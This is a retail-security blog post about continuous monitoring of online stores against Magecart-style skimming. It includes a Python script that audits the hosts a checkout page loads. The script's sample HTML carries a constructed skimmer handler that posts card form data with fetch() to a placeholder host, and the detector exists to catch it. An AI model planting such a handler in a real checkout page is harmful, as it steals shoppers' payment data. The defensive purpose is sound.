Blog contributed by Carlos Kizzee, Executive Vice President of Intelligence Operations & Legal Affairs, RH-ISAC.
eCommerce and online shopping are second nature to most of us now—both professionally and personally. Particularly during the pandemic, a greater percentage of our transactions are taking place online. And for those of us who work in the digital retail space, cybersecurity is a familiar concept: nobody ignores the need to protect our digital assets anymore. But are we really as well-protected as we think we are?
RH-ISAC and The Media Trust are exploring some of the unexpected sides of online retail in our series, 7 Crazy Things That Happen in Your Online Store Every Day. The first in this series, “Crazy Things You Wouldn’t See in Brick & Mortar,” focuses on security controls and monitoring for online retail stores. What is happening on your eCommerce site daily? Based on reviews of several hundred eCommerce retailers, we found it was all too common to see:
- No monitoring at all – many retailers do not monitor their online stores in any way
- Manual monitoring only – some retailers check a handful of pages by hand, at irregular intervals
- Limited automated monitoring – even fewer retailers run automated scans, and those usually cover only part of the site
Imagine if the security team you hired to watch your home or store were only checking the premises for a couple of minutes a day, leaving it completely unattended for well over 99% of the time—complete lunacy, right? But this is the level of security our review found across the digital retail ecosystem.
Thankfully, fixing this is not complicated, and the solution is unsurprising: monitor your website more carefully, and do it continuously rather than in occasional spot checks.
- Scan your entire environment (mobile apps and websites) continuously, and from a wide range of devices, browsers, and operating systems. If you’re a global enterprise, scan from different countries and locations.
- Scan your sensitive websites frequently (weekly, or at least monthly), and keep abreast of what is happening with them. By “sensitive,” we mean any site that holds your customers’ information (order history, personal information, payment information, etc.). Make sure access to those pages is limited appropriately.
- Scan your cart and checkout system regularly: this is where Magecart and other skimming attacks take place. A good practice is to make test purchases on your site while observing the traffic from outside your network, to see exactly which scripts load and where the data goes. Skimmers typically fire only on the checkout page and only when the form is submitted, so a test purchase that runs all the way through exposes them in a way that a look at the homepage never will.
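The checkout scan described in the list above can be automated as a simple resource audit: collect every host the checkout page references (script tags, iframes, form actions, tracking images, and URLs embedded in inline scripts), flag any host that is not on your approved list, and diff the host set against the last known-good baseline so a newly introduced third party stands out. The script below is an added example, not tooling from RH-ISAC or The Media Trust; the storefront `shop.example`, the allowlist, and the sample checkout HTML (including the inline handler that copies the form to an unknown host, written to have the shape of a skimmer) are constructed placeholders.

```python
"""Checkout-page resource audit: list every host a checkout page talks to
and flag the ones not on an approved list.  Added example; the storefront,
allowlist and sample HTML are hypothetical."""
import re
from html.parser import HTMLParser
from urllib.parse import urljoin, urlparse

# Hypothetical storefront and the hosts its checkout page may load from.
PAGE_URL = "https://shop.example/checkout"
ALLOWED_HOSTS = {"shop.example", "static.shop.example", "js.psp.example"}

# Constructed checkout page: first-party assets, the payment provider,
# one unapproved CDN script, and an inline submit handler that posts the
# form contents to an unknown host (skimmer-shaped, not a real sample).
SAMPLE_CHECKOUT_HTML = """
<html><head>
<script src="/static/app.js"></script>
<script src="https://js.psp.example/v3/"></script>
<script src="https://cdn.thirdparty.example/jquery.min.js"></script>
</head><body>
<form action="/checkout/submit" method="post"><input name="pan"></form>
<script>
  document.querySelector('form').addEventListener('submit', function () {
    var d = Object.fromEntries(new FormData(document.querySelector('form')));
    fetch('https://analytics-cdn.example/collect', {method: 'POST', body: JSON.stringify(d)});
  });
</script>
<img src="https://static.shop.example/pixel.gif">
</body></html>
"""

# Absolute http(s) URLs embedded in inline script bodies.
URL_RE = re.compile(r"https?://[^\s'\"<>()]+")


class ResourceCollector(HTMLParser):
    """Collects src/action references from tags plus inline script bodies."""

    def __init__(self):
        super().__init__()
        self.refs = []            # (kind, raw url) from src/action attributes
        self.inline_scripts = []  # bodies of <script> tags without src
        self._in_inline_script = False

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "script":
            if a.get("src"):
                self.refs.append(("script", a["src"]))
            else:
                self._in_inline_script = True
        elif tag in ("iframe", "img") and a.get("src"):
            self.refs.append((tag, a["src"]))
        elif tag == "form" and a.get("action"):
            self.refs.append(("form", a["action"]))

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_inline_script = False

    def handle_data(self, data):
        if self._in_inline_script:
            self.inline_scripts.append(data)


def extract_resources(html, page_url):
    """Return [(kind, absolute_url)] for every resource the page references."""
    p = ResourceCollector()
    p.feed(html)
    found = [(kind, urljoin(page_url, u)) for kind, u in p.refs]
    for body in p.inline_scripts:
        found += [("inline-script", u) for u in URL_RE.findall(body)]
    return found


def unexpected(found, allowed):
    """Keep http(s) references whose host is not on the allowlist."""
    out = []
    for kind, u in found:
        parsed = urlparse(u)
        if parsed.scheme in ("http", "https") and parsed.hostname not in allowed:
            out.append((kind, u))
    return out


def host_drift(found, baseline_hosts):
    """Compare this scan's hosts with the last known-good set: (new, gone)."""
    hosts = {urlparse(u).hostname for _, u in found if urlparse(u).hostname}
    return sorted(hosts - baseline_hosts), sorted(baseline_hosts - hosts)


if __name__ == "__main__":
    found = extract_resources(SAMPLE_CHECKOUT_HTML, PAGE_URL)
    for kind, u in unexpected(found, ALLOWED_HOSTS):
        print(f"UNAPPROVED {kind}: {u}")
    new, gone = host_drift(found, ALLOWED_HOSTS)
    print("new hosts since baseline:", new, "| missing:", gone)
```

Run against the sample, this flags the unapproved CDN script and the inline handler's exfiltration URL, and reports both hosts as new relative to the baseline. It is a static snapshot check only: skimmers are routinely injected at runtime, served conditionally by country, device or browser, or fetched by a loader that never appears in the HTML, which is exactly why the list above says to scan from many devices and locations. In practice feed this the HTML captured by a headless browser from each vantage point, and pair it with a log of the network requests made during the test purchase, since the final destination of the card data may show up only there.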
As usual, security best practices are the digital retailer’s best friend. Take the time to understand your security program and your scanning protocol, and make sure your online store is as secure as you think it is!
RH-ISAC and The Media Trust will be looking into more surprising, unexpected, and flat-out crazy things that happen in digital stores that wouldn’t happen anywhere else. Stay tuned!